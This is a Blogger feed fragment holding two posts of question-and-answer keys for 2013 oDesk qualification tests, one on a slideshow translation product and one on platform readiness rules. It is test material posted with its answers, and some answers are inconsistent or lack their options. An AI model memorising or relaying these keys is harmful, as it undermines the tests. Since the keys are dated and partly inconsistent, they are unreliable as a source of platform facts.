&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: a,b&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;What do you need to add the
comments of slideshow when changes to translations?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;LQE code&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Your user email&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;c.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Whether it is a major/minor error&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;d.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;All of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;e.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;None of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: a&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Editing the strings
automatically updates it to the TC (translation console).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;True&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;False&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: b&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;How do you navigate to an
entry to edit its translation?&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Clicking on the arrow buttons for the messages&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Clicking on the message directly scrolling through
messages with the arrow keys on your keyboard&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;c.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;All of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;d.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;None of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: a, b&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/2979724387676269473/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=2979724387676269473&amp;isPopup=true' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/2979724387676269473?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/2979724387676269473?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2013/02/odesk-slideshow-product-test-2013_5.html' title='oDesk Slideshow Product Test 2013'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-h8jXFEx6fLs/URCpZlEncPI/AAAAAAAAAT0/sAZYE66R4ik/s72-c/oDesk.PNG' height='72' width='72'/><thr:total>2</thr:total></entry><entry gd:etag='W/&quot;D0MCRn08eCp7ImA9WhNaFk4.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-7520348177922795024</id><published>2013-01-31T18:31:00.000+06:00</published><updated>2013-01-31T18:31:07.370+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2013-01-31T18:31:07.370+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Web Devolopment'/><category scheme='http://www.blogger.com/atom/ns#' term='Odesk'/><title>ODesk Readiness Test for Independent Contractors and Staffing Managers – Test 2013</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;a href="http://3.bp.blogspot.com/-vQ-x8KpZMMg/UQpicwOeb1I/AAAAAAAAAS4/lyMFzIy-670/s1600/oDesk.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="198" src="http://3.bp.blogspot.com/-vQ-x8KpZMMg/UQpicwOeb1I/AAAAAAAAAS4/lyMFzIy-670/s320/oDesk.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-family: Georgia; font-size: 17pt;"&gt;&lt;span style="color: magenta;"&gt;oDesk Readiness Test for Independent Contractors and Staffing Managers –
Test 2013&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="font-family: Georgia; font-size: 17pt;"&gt;&lt;span style="color: magenta;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;span style="color: red;"&gt;:&lt;/span&gt; Which of the
following actions are NOT allowed when applying to job openings?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;&amp;nbsp;Which of the
following is FALSE about weekly limits on hourly contracts?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;a.Hours in excess of the weekly limit will not
be billed to the employer&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;b.You should discuss any need to work beyond
your limit with your employer&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="background-color: white; border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;c.&amp;nbsp;The
weekly limit can be changed by the contractor (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;d.The weekly limit can be changed by the
employer&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;e.&amp;nbsp;Hours in excess of the weekly limit
are not guaranteed payment&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;b&gt;&lt;span style="color: red;"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="apple-converted-space" style="line-height: 10.5pt;"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;Which of the following statements about the oDesk Team application
are true?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;&amp;nbsp;Which of the
following are TRUE about the oDesk dispute process?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;a.The dispute process only applies to Hourly
contracts&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;b.&amp;nbsp;If you fail to respond, oDesk will
refund the employer and suspend your account&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;c.&amp;nbsp;If you reject the dispute, oDesk
specialists will review your Work Diary and evaluate it against the criteria of
the payment guarantee&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;d.&amp;nbsp;&amp;nbsp;Disputed hours ruled in the
employers favor are refunded&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;&amp;nbsp;Which of the
following are TRUE about your oDesk Work Diary?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;a.&amp;nbsp;&amp;nbsp;Allows employers to see
when and what their contractors are working on&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;b.&amp;nbsp;Enables automatic billing for hourly
contracts&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;c.The oDesk Team application auto-tracks time which
can be reviewed in the Work Diary&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;d.&amp;nbsp;Manual time can be added, but isn’t
guaranteed payment&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.
All of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;&amp;nbsp;What happens when
a contract ends?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;a.&amp;nbsp;You lose access to the Work Diary&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;b.&amp;nbsp;Both users can leave feedback&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;c.&amp;nbsp;The feedback system is double blind,
so your employer cannot see the feedback you left them until after they have
left feedback for you&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;d.&amp;nbsp; Hours will be billed (and disputes
may be filed) according to the usual weekly payment schedule&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;&amp;nbsp;Can I start my
own agency on oDesk?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp;a.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Yes!
You can create an agency and earn money by selling the services of your agency
contractors. (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;b.&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; No, oDesk is for
independent contractors only&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;Question:&lt;/span&gt;&lt;/strong&gt;&lt;span class="apple-converted-space" style="line-height: 10.5pt;"&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;Which of the following is true of your oDesk timelog?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style="line-height: 10.5pt;"&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: red;"&gt;Question:&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt; line-height: 10.5pt;"&gt;Which of the following
are&amp;nbsp;required&amp;nbsp;to qualify for guaranteed payment?&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;a.&amp;nbsp;An hourly contract&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;b.&amp;nbsp;Tracking&amp;nbsp;your time with the oDesk
Team application&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;c.&amp;nbsp;Entering relevant memos&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;d.&amp;nbsp;An employer with a verified payment
method&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: .0001pt; margin: 0in; vertical-align: baseline;"&gt;
&lt;strong&gt;&lt;span style="border: 1pt none windowtext; font-family: Georgia; font-size: 7pt; padding: 0in;"&gt;&lt;span style="color: magenta;"&gt;e.&amp;nbsp;All
of the above (Answer)&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-family: Georgia; font-size: 7pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="line-height: 10.5pt; margin-bottom: 19.2pt; margin-left: 0in; margin-right: 0in; margin-top: 19.2pt; vertical-align: baseline;"&gt;
